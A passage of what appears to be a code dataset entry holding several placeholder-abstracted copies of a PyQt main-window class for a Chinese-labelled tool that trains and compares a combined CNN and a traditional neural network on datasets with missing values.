fname.split('/')[-1].split('.')[0]\n self.presentModelNameT.setText(modelName)\n reply = QMessageBox.information(self, '设置结果', '模型设置成功',\n QMessageBox.Yes, QMessageBox.Yes)\n else:\n reply = QMessageBox.information(self, '设置结果', '模型设置失败',\n QMessageBox.Yes, QMessageBox.Yes)\n else:\n reply = QMessageBox.information(self, '设置结果', '模型设置失败',\n QMessageBox.Yes, QMessageBox.Yes)\n return\n\n def showResult(self):\n if self.sender() is self.showResultButton:\n if self.traingWidgetOnFlag['New']:\n reply = QMessageBox.information(self, '提示', '训练正在进行',\n QMessageBox.Yes, QMessageBox.Yes)\n return\n self.showResultW = showResultWidget.ShowResultWidget(\n 'combine-CNN预测结果展示', self, 'New')\n elif self.sender() is self.showResultButtonT:\n if self.traingWidgetOnFlag['Tra']:\n reply = QMessageBox.information(self, '提示', '训练正在进行',\n QMessageBox.Yes, QMessageBox.Yes)\n return\n self.showResultW = showResultWidget.ShowResultWidget(\n 'traditional NN预测结果展示', self, 'Tra')\n return\n\n def showJudge(self):\n if self.sender() is self.judgeResultButton:\n if self.traingWidgetOnFlag['New']:\n reply = QMessageBox.information(self, '提示', '训练正在进行',\n QMessageBox.Yes, QMessageBox.Yes)\n return\n self.chooseJDWin = (chooseJudgeDataSetWidget.\n chooseJudgeDataSetWidget(\n 'Choose Judgement-based-on Data Set', self, 'New'))\n elif self.sender() is self.judgeResultButtonT:\n if self.traingWidgetOnFlag['Tra']:\n reply = QMessageBox.information(self, '提示', '训练正在进行',\n QMessageBox.Yes, QMessageBox.Yes)\n return\n self.chooseJDWin = (chooseJudgeDataSetWidget.\n chooseJudgeDataSetWidget(\n 'Choose Judgement-based-on Data Set', self, 'Tra'))\n\n\n<code token>\n", "<import token>\n\n\nclass MyMainWindow(QMainWindow):\n\n def __init__(self):\n super().__init__()\n self.windowLength = 1250\n self.windowHigh = 900\n self.fname = dict()\n self.fname['New'] = None\n self.fname['Tra'] = None\n self.dataLossRate = dict()\n self.dataSetLossValue = dict()\n self.dataFor = dict()\n self.dataFor['New'] = None\n self.dataLossRate['New'] = 0.0\n self.dataSetLossValue['New'] = 0.0\n self.dataFor['Tra'] = None\n self.dataLossRate['Tra'] = 0.0\n self.dataSetLossValue['Tra'] = 0.0\n self.traingWidgetOnFlag = dict()\n self.traingWidgetOnFlag['New'] = False\n self.traingWidgetOnFlag['Tra'] = False\n self.combineNumConv = 2\n self.convCoreNum = 5\n self.combineNumPooling = 4\n self.fullConnectOutInRate = 0.5\n self.mcbcnn = None\n self.trann = None\n self.trainingW = None\n self.trainingWT = None\n self.initUI()\n self.initConnect()\n\n def initUI(self):\n self.statusBar().showMessage('Ready')\n dataModule = QVBoxLayout()\n self.dataFileChooseButton = QPushButton('选择数据')\n self.dataFileChooseButton.setFont(QFont('微软雅黑', 16))\n self.dataLossSimulateSettingButton = QPushButton('设置数据缺失参数')\n self.dataLossSimulateSettingButton.setFont(QFont('微软雅黑', 16))\n self.dataShowButton = QPushButton('展示数据')\n self.dataShowButton.setFont(QFont('微软雅黑', 16))\n label = QLabel('Present Data:')\n label.setFont(QFont('微软雅黑', 16))\n self.presentDataName = QLabel('None')\n self.presentDataName.setFont(QFont('微软雅黑', 16))\n labelbox = QVBoxLayout()\n labelbox.addWidget(label)\n labelbox.addWidget(self.presentDataName)\n dataModule.addStretch(1)\n dataModule.addLayout(labelbox)\n dataModule.addStretch(1)\n dataModule.addWidget(self.dataFileChooseButton)\n dataModule.addStretch(1)\n dataModule.addWidget(self.dataLossSimulateSettingButton)\n dataModule.addStretch(1)\n dataModule.addWidget(self.dataShowButton)\n dataModule.addStretch(1)\n trainingModule = QVBoxLayout()\n 
self.setModelParametersButton = QPushButton('Model Parameters')\n self.setModelParametersButton.setFont(QFont('微软雅黑', 16))\n self.trainingButton = QPushButton('Training')\n self.trainingButton.setFont(QFont('微软雅黑', 16))\n self.saveModelButton = QPushButton('Save Model')\n self.saveModelButton.setFont(QFont('微软雅黑', 16))\n self.loadModelButton = QPushButton('Load Model')\n self.loadModelButton.setFont(QFont('微软雅黑', 16))\n label = QLabel('Present Model:')\n label.setFont(QFont('微软雅黑', 16))\n self.presentModelName = QLabel('None')\n self.presentModelName.setFont(QFont('微软雅黑', 16))\n labelbox = QVBoxLayout()\n labelbox.addWidget(label)\n labelbox.addWidget(self.presentModelName)\n trainingModule.addStretch(1)\n trainingModule.addLayout(labelbox)\n trainingModule.addStretch(1)\n trainingModule.addWidget(self.setModelParametersButton)\n trainingModule.addStretch(1)\n trainingModule.addWidget(self.trainingButton)\n trainingModule.addStretch(1)\n trainingModule.addWidget(self.saveModelButton)\n trainingModule.addStretch(1)\n trainingModule.addWidget(self.loadModelButton)\n trainingModule.addStretch(1)\n resultShowModule = QVBoxLayout()\n self.showResultButton = QPushButton('分类结果展示')\n self.showResultButton.setFont(QFont('微软雅黑', 16))\n self.judgeResultButton = QPushButton('分类结果评估')\n self.judgeResultButton.setFont(QFont('微软雅黑', 16))\n resultShowModule.addWidget(self.showResultButton)\n resultShowModule.addWidget(self.judgeResultButton)\n hboxTop = QHBoxLayout()\n hboxTop.addStretch(1)\n mcnnLabel = QLabel('Combine-CNN:')\n mcnnLabel.setFont(QFont('微软雅黑', 24, QFont.Bold))\n hboxTop.addWidget(mcnnLabel)\n hboxTop.addStretch(1)\n hboxTop.addLayout(dataModule)\n hboxTop.addStretch(1)\n hboxTop.addLayout(trainingModule)\n hboxTop.addStretch(1)\n hboxTop.addLayout(resultShowModule)\n hboxTop.addStretch(1)\n dataModuleT = QVBoxLayout()\n self.dataFileChooseButtonT = QPushButton('选择数据')\n self.dataFileChooseButtonT.setFont(QFont('微软雅黑', 16))\n self.dataLossSimulateSettingButtonT = QPushButton('设置数据缺失参数')\n self.dataLossSimulateSettingButtonT.setFont(QFont('微软雅黑', 16))\n self.dataPreProcessButtonT = QPushButton('数据预处理')\n self.dataPreProcessButtonT.setFont(QFont('微软雅黑', 16))\n self.dataShowButtonT = QPushButton('展示数据')\n self.dataShowButtonT.setFont(QFont('微软雅黑', 16))\n label = QLabel('Present Data:')\n label.setFont(QFont('微软雅黑', 16))\n self.presentDataNameT = QLabel('None')\n self.presentDataNameT.setFont(QFont('微软雅黑', 16))\n labelbox = QVBoxLayout()\n labelbox.addWidget(label)\n labelbox.addWidget(self.presentDataNameT)\n dataModuleT.addStretch(1)\n dataModuleT.addLayout(labelbox)\n dataModuleT.addStretch(1)\n dataModuleT.addWidget(self.dataFileChooseButtonT)\n dataModuleT.addStretch(1)\n dataModuleT.addWidget(self.dataLossSimulateSettingButtonT)\n dataModuleT.addStretch(1)\n dataModuleT.addWidget(self.dataPreProcessButtonT)\n dataModuleT.addStretch(1)\n dataModuleT.addWidget(self.dataShowButtonT)\n dataModuleT.addStretch(1)\n trainingModuleT = QVBoxLayout()\n self.setModelParametersButtonT = QPushButton('Model Parameters')\n self.setModelParametersButtonT.setFont(QFont('微软雅黑', 16))\n self.trainingButtonT = QPushButton('Training')\n self.trainingButtonT.setFont(QFont('微软雅黑', 16))\n self.saveModelButtonT = QPushButton('Save Model')\n self.saveModelButtonT.setFont(QFont('微软雅黑', 16))\n self.loadModelButtonT = QPushButton('Load Model')\n self.loadModelButtonT.setFont(QFont('微软雅黑', 16))\n label = QLabel('Present Model:')\n label.setFont(QFont('微软雅黑', 16))\n self.presentModelNameT = QLabel('None')\n 
self.presentModelNameT.setFont(QFont('微软雅黑', 16))\n labelbox = QVBoxLayout()\n labelbox.addWidget(label)\n labelbox.addWidget(self.presentModelNameT)\n trainingModuleT.addStretch(1)\n trainingModuleT.addLayout(labelbox)\n trainingModuleT.addStretch(1)\n trainingModuleT.addWidget(self.setModelParametersButtonT)\n trainingModuleT.addStretch(1)\n trainingModuleT.addWidget(self.trainingButtonT)\n trainingModuleT.addStretch(1)\n trainingModuleT.addWidget(self.saveModelButtonT)\n trainingModuleT.addStretch(1)\n trainingModuleT.addWidget(self.loadModelButtonT)\n trainingModuleT.addStretch(1)\n resultShowModuleT = QVBoxLayout()\n self.showResultButtonT = QPushButton('分类结果展示')\n self.showResultButtonT.setFont(QFont('微软雅黑', 16))\n self.judgeResultButtonT = QPushButton('分类结果评估')\n self.judgeResultButtonT.setFont(QFont('微软雅黑', 16))\n resultShowModuleT.addWidget(self.showResultButtonT)\n resultShowModuleT.addWidget(self.judgeResultButtonT)\n hboxBottom = QHBoxLayout(self)\n hboxBottom.addStretch(1)\n traditionNNLabel = QLabel('Traditional NN:')\n traditionNNLabel.setFont(QFont('微软雅黑', 24, QFont.Bold))\n hboxBottom.addWidget(traditionNNLabel)\n hboxBottom.addStretch(1)\n hboxBottom.addLayout(dataModuleT)\n hboxBottom.addStretch(1)\n hboxBottom.addLayout(trainingModuleT)\n hboxBottom.addStretch(1)\n hboxBottom.addLayout(resultShowModuleT)\n hboxBottom.addStretch(1)\n splitterLine = QLabel(self)\n splitterLine.setFont(QFont('Times', 1))\n col = QColor(0, 0, 0)\n splitterLine.setStyleSheet('QWidget { background-color: %s }' % col\n .name())\n splitterLine.resize(splitterLine.sizeHint())\n vbox = QVBoxLayout()\n vbox.addLayout(hboxTop)\n vbox.addWidget(splitterLine)\n vbox.addLayout(hboxBottom)\n mainWidget = QWidget()\n mainWidget.setLayout(vbox)\n self.setCentralWidget(mainWidget)\n self.setGeometry(350, 100, self.windowLength, self.windowHigh)\n self.setWindowTitle('适用于有缺失值数据集的神经网络系统')\n self.show()\n\n def initConnect(self):\n self.dataFileChooseButton.clicked.connect(self.chooseData)\n self.dataFileChooseButtonT.clicked.connect(self.chooseData)\n self.dataLossSimulateSettingButton.clicked.connect(self.\n setLossParameter)\n self.dataLossSimulateSettingButtonT.clicked.connect(self.\n setLossParameter)\n self.dataShowButton.clicked.connect(self.showData)\n self.dataShowButtonT.clicked.connect(self.showData)\n self.dataPreProcessButtonT.clicked.connect(self.preProcess)\n self.setModelParametersButton.clicked.connect(self.setModelParameters)\n self.setModelParametersButtonT.clicked.connect(self.setModelParameters)\n self.trainingButton.clicked.connect(self.training)\n self.trainingButtonT.clicked.connect(self.training)\n self.saveModelButton.clicked.connect(self.saveModel)\n self.saveModelButtonT.clicked.connect(self.saveModel)\n self.loadModelButton.clicked.connect(self.loadModel)\n self.loadModelButtonT.clicked.connect(self.loadModel)\n self.showResultButton.clicked.connect(self.showResult)\n self.showResultButtonT.clicked.connect(self.showResult)\n self.judgeResultButton.clicked.connect(self.showJudge)\n self.judgeResultButtonT.clicked.connect(self.showJudge)\n\n def chooseData(self):\n if self.sender() is self.dataFileChooseButton:\n self.fname['New'], ok = QFileDialog.getOpenFileName(self,\n 'Open file', '..', 'Text files (*.txt)')\n if ok:\n self.loadData()\n elif self.sender() is self.dataFileChooseButtonT:\n self.fname['Tra'], ok = QFileDialog.getOpenFileName(self,\n 'Open file', '..', 'Text files (*.txt)')\n if ok:\n self.loadData()\n return\n\n def loadData(self):\n if self.sender() is 
self.dataFileChooseButton:\n try:\n self.dataFor['New'] = myLoadData.loadData(self.fname['New'],\n self.dataLossRate['New'], self.dataSetLossValue['New'])\n except FileNotFoundError as e:\n reply = QMessageBox.information(self, 'Message',\n 'Data file not exist', QMessageBox.Yes, QMessageBox.Yes)\n return\n except Exception:\n reply = QMessageBox.information(self, 'Message',\n 'Data file format error', QMessageBox.Yes, QMessageBox.Yes)\n return\n dataname = self.fname['New'].split('/')[-1].split('.')[0]\n self.presentDataName.setText(dataname)\n self.presentDataName.resize(self.presentDataName.sizeHint())\n elif self.sender() is self.dataFileChooseButtonT:\n try:\n self.dataFor['Tra'] = myLoadData.loadData(self.fname['Tra'],\n self.dataLossRate['Tra'], self.dataSetLossValue['Tra'])\n except FileNotFoundError as e:\n reply = QMessageBox.information(self, 'Message',\n 'Data file not exist', QMessageBox.Yes, QMessageBox.Yes)\n return\n except Exception:\n reply = QMessageBox.information(self, 'Message',\n 'Data file format error', QMessageBox.Yes, QMessageBox.Yes)\n return\n dataname = self.fname['Tra'].split('/')[-1].split('.')[0]\n self.presentDataNameT.setText(dataname)\n self.presentDataNameT.resize(self.presentDataNameT.sizeHint())\n return\n\n def setLossParameter(self):\n if self.sender() is self.dataLossSimulateSettingButton:\n self.setLPDialog = setLossParameterDialog.setLossParameterDialog(\n 'combine-CNN设置缺失参数', self, 'New')\n elif self.sender() is self.dataLossSimulateSettingButtonT:\n self.setLPDialog = setLossParameterDialog.setLossParameterDialog(\n 'traditional NN设置缺失参数', self, 'Tra')\n return\n\n def showData(self):\n if self.sender() is self.dataShowButton:\n self.showDataW = showDataWidget.ShowDataWidget('combine-CNN数据展示',\n self, 'New')\n elif self.sender() is self.dataShowButtonT:\n self.showDataW = showDataWidget.ShowDataWidget('traditional NN数据展示'\n , self, 'Tra')\n return\n\n def preProcess(self):\n if self.dataFor['Tra'] is None:\n reply = QMessageBox.information(self, '数据错误', '没有加载数据,无法预处理',\n QMessageBox.Yes, QMessageBox.Yes)\n else:\n self.dataFor['Tra'].MeanPreProcess()\n reply = QMessageBox.information(self, 'Message',\n 'PreProcess succeed!', QMessageBox.Yes, QMessageBox.Yes)\n return\n\n def setModelParameters(self):\n if self.sender() is self.setModelParametersButton:\n self.setModelParaW = (setModelParametersDialog.\n setLossParameterDialog('combine-CNN模型参数设置', self, 'New'))\n elif self.sender() is self.setModelParametersButtonT:\n self.setModelParaW = (setModelParametersDialog.\n setLossParameterDialog('traditional NN模型参数设置', self, 'Tra'))\n <function token>\n\n def saveModel(self):\n if self.sender() is self.saveModelButton:\n if self.mcbcnn is None:\n reply = QMessageBox.information(self, '模型错误', '模型不存在',\n QMessageBox.Yes, QMessageBox.Yes)\n return\n else:\n fname, ok = QFileDialog.getSaveFileName(self, 'Save Model',\n '..\\\\myCombineCNN.cbcnn.json',\n 'Combine-CNN json files (*.cbcnn.json)')\n if ok:\n succeed = self.mcbcnn.saveModel(fname)\n if succeed:\n reply = QMessageBox.information(self, '保存结果',\n '模型保存成功', QMessageBox.Yes, QMessageBox.Yes)\n else:\n reply = QMessageBox.information(self, '保存结果',\n '模型保存失败', QMessageBox.Yes, QMessageBox.Yes)\n else:\n reply = QMessageBox.information(self, '保存结果', '模型保存失败',\n QMessageBox.Yes, QMessageBox.Yes)\n elif self.sender() is self.saveModelButtonT:\n if self.trann is None:\n reply = QMessageBox.information(self, '模型错误', '模型不存在',\n QMessageBox.Yes, QMessageBox.Yes)\n return\n else:\n fname, ok = 
QFileDialog.getSaveFileName(self, 'Save Model',\n '..\\\\traditionalNN.trann.json',\n 'Traditional NN json files (*.trann.json)')\n if ok:\n succeed = self.trann.saveModel(fname)\n if succeed:\n reply = QMessageBox.information(self, '保存结果',\n '模型保存成功', QMessageBox.Yes, QMessageBox.Yes)\n else:\n reply = QMessageBox.information(self, '保存结果',\n '模型保存失败', QMessageBox.Yes, QMessageBox.Yes)\n else:\n reply = QMessageBox.information(self, '保存结果', '模型保存失败',\n QMessageBox.Yes, QMessageBox.Yes)\n\n def loadModel(self):\n if self.sender() is self.loadModelButton:\n fname, ok = QFileDialog.getOpenFileName(self, 'Load Model',\n '..', 'Combine-CNN json files (*.cbcnn.json)')\n if ok:\n if self.mcbcnn is None:\n self.mcbcnn = myCombineCNN.myCombineCNN(None, self.\n combineNumConv, self.convCoreNum, self.\n combineNumPooling)\n succeed = self.mcbcnn.setModel(fname)\n if succeed:\n modelName = fname.split('/')[-1].split('.')[0]\n self.presentModelName.setText(modelName)\n reply = QMessageBox.information(self, '设置结果', '模型设置成功',\n QMessageBox.Yes, QMessageBox.Yes)\n else:\n reply = QMessageBox.information(self, '设置结果', '模型设置失败',\n QMessageBox.Yes, QMessageBox.Yes)\n else:\n reply = QMessageBox.information(self, '设置结果', '模型设置失败',\n QMessageBox.Yes, QMessageBox.Yes)\n elif self.sender() is self.loadModelButtonT:\n fname, ok = QFileDialog.getOpenFileName(self, 'Load Model',\n '..', 'Traditional NN json files (*.trann.json)')\n if ok:\n if self.trann is None:\n self.trann = traditionalNN.traditionalNN(None)\n succeed = self.trann.setModel(fname)\n if succeed:\n modelName = fname.split('/')[-1].split('.')[0]\n self.presentModelNameT.setText(modelName)\n reply = QMessageBox.information(self, '设置结果', '模型设置成功',\n QMessageBox.Yes, QMessageBox.Yes)\n else:\n reply = QMessageBox.information(self, '设置结果', '模型设置失败',\n QMessageBox.Yes, QMessageBox.Yes)\n else:\n reply = QMessageBox.information(self, '设置结果', '模型设置失败',\n QMessageBox.Yes, QMessageBox.Yes)\n return\n\n def showResult(self):\n if self.sender() is self.showResultButton:\n if self.traingWidgetOnFlag['New']:\n reply = QMessageBox.information(self, '提示', '训练正在进行',\n QMessageBox.Yes, QMessageBox.Yes)\n return\n self.showResultW = showResultWidget.ShowResultWidget(\n 'combine-CNN预测结果展示', self, 'New')\n elif self.sender() is self.showResultButtonT:\n if self.traingWidgetOnFlag['Tra']:\n reply = QMessageBox.information(self, '提示', '训练正在进行',\n QMessageBox.Yes, QMessageBox.Yes)\n return\n self.showResultW = showResultWidget.ShowResultWidget(\n 'traditional NN预测结果展示', self, 'Tra')\n return\n\n def showJudge(self):\n if self.sender() is self.judgeResultButton:\n if self.traingWidgetOnFlag['New']:\n reply = QMessageBox.information(self, '提示', '训练正在进行',\n QMessageBox.Yes, QMessageBox.Yes)\n return\n self.chooseJDWin = (chooseJudgeDataSetWidget.\n chooseJudgeDataSetWidget(\n 'Choose Judgement-based-on Data Set', self, 'New'))\n elif self.sender() is self.judgeResultButtonT:\n if self.traingWidgetOnFlag['Tra']:\n reply = QMessageBox.information(self, '提示', '训练正在进行',\n QMessageBox.Yes, QMessageBox.Yes)\n return\n self.chooseJDWin = (chooseJudgeDataSetWidget.\n chooseJudgeDataSetWidget(\n 'Choose Judgement-based-on Data Set', self, 'Tra'))\n\n\n<code token>\n", "<import token>\n\n\nclass MyMainWindow(QMainWindow):\n\n def __init__(self):\n super().__init__()\n self.windowLength = 1250\n self.windowHigh = 900\n self.fname = dict()\n self.fname['New'] = None\n self.fname['Tra'] = None\n self.dataLossRate = dict()\n self.dataSetLossValue = dict()\n self.dataFor = dict()\n 
self.dataFor['New'] = None\n self.dataLossRate['New'] = 0.0\n self.dataSetLossValue['New'] = 0.0\n self.dataFor['Tra'] = None\n self.dataLossRate['Tra'] = 0.0\n self.dataSetLossValue['Tra'] = 0.0\n self.traingWidgetOnFlag = dict()\n self.traingWidgetOnFlag['New'] = False\n self.traingWidgetOnFlag['Tra'] = False\n self.combineNumConv = 2\n self.convCoreNum = 5\n self.combineNumPooling = 4\n self.fullConnectOutInRate = 0.5\n self.mcbcnn = None\n self.trann = None\n self.trainingW = None\n self.trainingWT = None\n self.initUI()\n self.initConnect()\n\n def initUI(self):\n self.statusBar().showMessage('Ready')\n dataModule = QVBoxLayout()\n self.dataFileChooseButton = QPushButton('选择数据')\n self.dataFileChooseButton.setFont(QFont('微软雅黑', 16))\n self.dataLossSimulateSettingButton = QPushButton('设置数据缺失参数')\n self.dataLossSimulateSettingButton.setFont(QFont('微软雅黑', 16))\n self.dataShowButton = QPushButton('展示数据')\n self.dataShowButton.setFont(QFont('微软雅黑', 16))\n label = QLabel('Present Data:')\n label.setFont(QFont('微软雅黑', 16))\n self.presentDataName = QLabel('None')\n self.presentDataName.setFont(QFont('微软雅黑', 16))\n labelbox = QVBoxLayout()\n labelbox.addWidget(label)\n labelbox.addWidget(self.presentDataName)\n dataModule.addStretch(1)\n dataModule.addLayout(labelbox)\n dataModule.addStretch(1)\n dataModule.addWidget(self.dataFileChooseButton)\n dataModule.addStretch(1)\n dataModule.addWidget(self.dataLossSimulateSettingButton)\n dataModule.addStretch(1)\n dataModule.addWidget(self.dataShowButton)\n dataModule.addStretch(1)\n trainingModule = QVBoxLayout()\n self.setModelParametersButton = QPushButton('Model Parameters')\n self.setModelParametersButton.setFont(QFont('微软雅黑', 16))\n self.trainingButton = QPushButton('Training')\n self.trainingButton.setFont(QFont('微软雅黑', 16))\n self.saveModelButton = QPushButton('Save Model')\n self.saveModelButton.setFont(QFont('微软雅黑', 16))\n self.loadModelButton = QPushButton('Load Model')\n self.loadModelButton.setFont(QFont('微软雅黑', 16))\n label = QLabel('Present Model:')\n label.setFont(QFont('微软雅黑', 16))\n self.presentModelName = QLabel('None')\n self.presentModelName.setFont(QFont('微软雅黑', 16))\n labelbox = QVBoxLayout()\n labelbox.addWidget(label)\n labelbox.addWidget(self.presentModelName)\n trainingModule.addStretch(1)\n trainingModule.addLayout(labelbox)\n trainingModule.addStretch(1)\n trainingModule.addWidget(self.setModelParametersButton)\n trainingModule.addStretch(1)\n trainingModule.addWidget(self.trainingButton)\n trainingModule.addStretch(1)\n trainingModule.addWidget(self.saveModelButton)\n trainingModule.addStretch(1)\n trainingModule.addWidget(self.loadModelButton)\n trainingModule.addStretch(1)\n resultShowModule = QVBoxLayout()\n self.showResultButton = QPushButton('分类结果展示')\n self.showResultButton.setFont(QFont('微软雅黑', 16))\n self.judgeResultButton = QPushButton('分类结果评估')\n self.judgeResultButton.setFont(QFont('微软雅黑', 16))\n resultShowModule.addWidget(self.showResultButton)\n resultShowModule.addWidget(self.judgeResultButton)\n hboxTop = QHBoxLayout()\n hboxTop.addStretch(1)\n mcnnLabel = QLabel('Combine-CNN:')\n mcnnLabel.setFont(QFont('微软雅黑', 24, QFont.Bold))\n hboxTop.addWidget(mcnnLabel)\n hboxTop.addStretch(1)\n hboxTop.addLayout(dataModule)\n hboxTop.addStretch(1)\n hboxTop.addLayout(trainingModule)\n hboxTop.addStretch(1)\n hboxTop.addLayout(resultShowModule)\n hboxTop.addStretch(1)\n dataModuleT = QVBoxLayout()\n self.dataFileChooseButtonT = QPushButton('选择数据')\n self.dataFileChooseButtonT.setFont(QFont('微软雅黑', 16))\n 
self.dataLossSimulateSettingButtonT = QPushButton('设置数据缺失参数')\n self.dataLossSimulateSettingButtonT.setFont(QFont('微软雅黑', 16))\n self.dataPreProcessButtonT = QPushButton('数据预处理')\n self.dataPreProcessButtonT.setFont(QFont('微软雅黑', 16))\n self.dataShowButtonT = QPushButton('展示数据')\n self.dataShowButtonT.setFont(QFont('微软雅黑', 16))\n label = QLabel('Present Data:')\n label.setFont(QFont('微软雅黑', 16))\n self.presentDataNameT = QLabel('None')\n self.presentDataNameT.setFont(QFont('微软雅黑', 16))\n labelbox = QVBoxLayout()\n labelbox.addWidget(label)\n labelbox.addWidget(self.presentDataNameT)\n dataModuleT.addStretch(1)\n dataModuleT.addLayout(labelbox)\n dataModuleT.addStretch(1)\n dataModuleT.addWidget(self.dataFileChooseButtonT)\n dataModuleT.addStretch(1)\n dataModuleT.addWidget(self.dataLossSimulateSettingButtonT)\n dataModuleT.addStretch(1)\n dataModuleT.addWidget(self.dataPreProcessButtonT)\n dataModuleT.addStretch(1)\n dataModuleT.addWidget(self.dataShowButtonT)\n dataModuleT.addStretch(1)\n trainingModuleT = QVBoxLayout()\n self.setModelParametersButtonT = QPushButton('Model Parameters')\n self.setModelParametersButtonT.setFont(QFont('微软雅黑', 16))\n self.trainingButtonT = QPushButton('Training')\n self.trainingButtonT.setFont(QFont('微软雅黑', 16))\n self.saveModelButtonT = QPushButton('Save Model')\n self.saveModelButtonT.setFont(QFont('微软雅黑', 16))\n self.loadModelButtonT = QPushButton('Load Model')\n self.loadModelButtonT.setFont(QFont('微软雅黑', 16))\n label = QLabel('Present Model:')\n label.setFont(QFont('微软雅黑', 16))\n self.presentModelNameT = QLabel('None')\n self.presentModelNameT.setFont(QFont('微软雅黑', 16))\n labelbox = QVBoxLayout()\n labelbox.addWidget(label)\n labelbox.addWidget(self.presentModelNameT)\n trainingModuleT.addStretch(1)\n trainingModuleT.addLayout(labelbox)\n trainingModuleT.addStretch(1)\n trainingModuleT.addWidget(self.setModelParametersButtonT)\n trainingModuleT.addStretch(1)\n trainingModuleT.addWidget(self.trainingButtonT)\n trainingModuleT.addStretch(1)\n trainingModuleT.addWidget(self.saveModelButtonT)\n trainingModuleT.addStretch(1)\n trainingModuleT.addWidget(self.loadModelButtonT)\n trainingModuleT.addStretch(1)\n resultShowModuleT = QVBoxLayout()\n self.showResultButtonT = QPushButton('分类结果展示')\n self.showResultButtonT.setFont(QFont('微软雅黑', 16))\n self.judgeResultButtonT = QPushButton('分类结果评估')\n self.judgeResultButtonT.setFont(QFont('微软雅黑', 16))\n resultShowModuleT.addWidget(self.showResultButtonT)\n resultShowModuleT.addWidget(self.judgeResultButtonT)\n hboxBottom = QHBoxLayout(self)\n hboxBottom.addStretch(1)\n traditionNNLabel = QLabel('Traditional NN:')\n traditionNNLabel.setFont(QFont('微软雅黑', 24, QFont.Bold))\n hboxBottom.addWidget(traditionNNLabel)\n hboxBottom.addStretch(1)\n hboxBottom.addLayout(dataModuleT)\n hboxBottom.addStretch(1)\n hboxBottom.addLayout(trainingModuleT)\n hboxBottom.addStretch(1)\n hboxBottom.addLayout(resultShowModuleT)\n hboxBottom.addStretch(1)\n splitterLine = QLabel(self)\n splitterLine.setFont(QFont('Times', 1))\n col = QColor(0, 0, 0)\n splitterLine.setStyleSheet('QWidget { background-color: %s }' % col\n .name())\n splitterLine.resize(splitterLine.sizeHint())\n vbox = QVBoxLayout()\n vbox.addLayout(hboxTop)\n vbox.addWidget(splitterLine)\n vbox.addLayout(hboxBottom)\n mainWidget = QWidget()\n mainWidget.setLayout(vbox)\n self.setCentralWidget(mainWidget)\n self.setGeometry(350, 100, self.windowLength, self.windowHigh)\n self.setWindowTitle('适用于有缺失值数据集的神经网络系统')\n self.show()\n\n def initConnect(self):\n 
self.dataFileChooseButton.clicked.connect(self.chooseData)\n self.dataFileChooseButtonT.clicked.connect(self.chooseData)\n self.dataLossSimulateSettingButton.clicked.connect(self.\n setLossParameter)\n self.dataLossSimulateSettingButtonT.clicked.connect(self.\n setLossParameter)\n self.dataShowButton.clicked.connect(self.showData)\n self.dataShowButtonT.clicked.connect(self.showData)\n self.dataPreProcessButtonT.clicked.connect(self.preProcess)\n self.setModelParametersButton.clicked.connect(self.setModelParameters)\n self.setModelParametersButtonT.clicked.connect(self.setModelParameters)\n self.trainingButton.clicked.connect(self.training)\n self.trainingButtonT.clicked.connect(self.training)\n self.saveModelButton.clicked.connect(self.saveModel)\n self.saveModelButtonT.clicked.connect(self.saveModel)\n self.loadModelButton.clicked.connect(self.loadModel)\n self.loadModelButtonT.clicked.connect(self.loadModel)\n self.showResultButton.clicked.connect(self.showResult)\n self.showResultButtonT.clicked.connect(self.showResult)\n self.judgeResultButton.clicked.connect(self.showJudge)\n self.judgeResultButtonT.clicked.connect(self.showJudge)\n\n def chooseData(self):\n if self.sender() is self.dataFileChooseButton:\n self.fname['New'], ok = QFileDialog.getOpenFileName(self,\n 'Open file', '..', 'Text files (*.txt)')\n if ok:\n self.loadData()\n elif self.sender() is self.dataFileChooseButtonT:\n self.fname['Tra'], ok = QFileDialog.getOpenFileName(self,\n 'Open file', '..', 'Text files (*.txt)')\n if ok:\n self.loadData()\n return\n\n def loadData(self):\n if self.sender() is self.dataFileChooseButton:\n try:\n self.dataFor['New'] = myLoadData.loadData(self.fname['New'],\n self.dataLossRate['New'], self.dataSetLossValue['New'])\n except FileNotFoundError as e:\n reply = QMessageBox.information(self, 'Message',\n 'Data file not exist', QMessageBox.Yes, QMessageBox.Yes)\n return\n except Exception:\n reply = QMessageBox.information(self, 'Message',\n 'Data file format error', QMessageBox.Yes, QMessageBox.Yes)\n return\n dataname = self.fname['New'].split('/')[-1].split('.')[0]\n self.presentDataName.setText(dataname)\n self.presentDataName.resize(self.presentDataName.sizeHint())\n elif self.sender() is self.dataFileChooseButtonT:\n try:\n self.dataFor['Tra'] = myLoadData.loadData(self.fname['Tra'],\n self.dataLossRate['Tra'], self.dataSetLossValue['Tra'])\n except FileNotFoundError as e:\n reply = QMessageBox.information(self, 'Message',\n 'Data file not exist', QMessageBox.Yes, QMessageBox.Yes)\n return\n except Exception:\n reply = QMessageBox.information(self, 'Message',\n 'Data file format error', QMessageBox.Yes, QMessageBox.Yes)\n return\n dataname = self.fname['Tra'].split('/')[-1].split('.')[0]\n self.presentDataNameT.setText(dataname)\n self.presentDataNameT.resize(self.presentDataNameT.sizeHint())\n return\n\n def setLossParameter(self):\n if self.sender() is self.dataLossSimulateSettingButton:\n self.setLPDialog = setLossParameterDialog.setLossParameterDialog(\n 'combine-CNN设置缺失参数', self, 'New')\n elif self.sender() is self.dataLossSimulateSettingButtonT:\n self.setLPDialog = setLossParameterDialog.setLossParameterDialog(\n 'traditional NN设置缺失参数', self, 'Tra')\n return\n\n def showData(self):\n if self.sender() is self.dataShowButton:\n self.showDataW = showDataWidget.ShowDataWidget('combine-CNN数据展示',\n self, 'New')\n elif self.sender() is self.dataShowButtonT:\n self.showDataW = showDataWidget.ShowDataWidget('traditional NN数据展示'\n , self, 'Tra')\n return\n <function token>\n\n def 
setModelParameters(self):\n if self.sender() is self.setModelParametersButton:\n self.setModelParaW = (setModelParametersDialog.\n setLossParameterDialog('combine-CNN模型参数设置', self, 'New'))\n elif self.sender() is self.setModelParametersButtonT:\n self.setModelParaW = (setModelParametersDialog.\n setLossParameterDialog('traditional NN模型参数设置', self, 'Tra'))\n <function token>\n\n def saveModel(self):\n if self.sender() is self.saveModelButton:\n if self.mcbcnn is None:\n reply = QMessageBox.information(self, '模型错误', '模型不存在',\n QMessageBox.Yes, QMessageBox.Yes)\n return\n else:\n fname, ok = QFileDialog.getSaveFileName(self, 'Save Model',\n '..\\\\myCombineCNN.cbcnn.json',\n 'Combine-CNN json files (*.cbcnn.json)')\n if ok:\n succeed = self.mcbcnn.saveModel(fname)\n if succeed:\n reply = QMessageBox.information(self, '保存结果',\n '模型保存成功', QMessageBox.Yes, QMessageBox.Yes)\n else:\n reply = 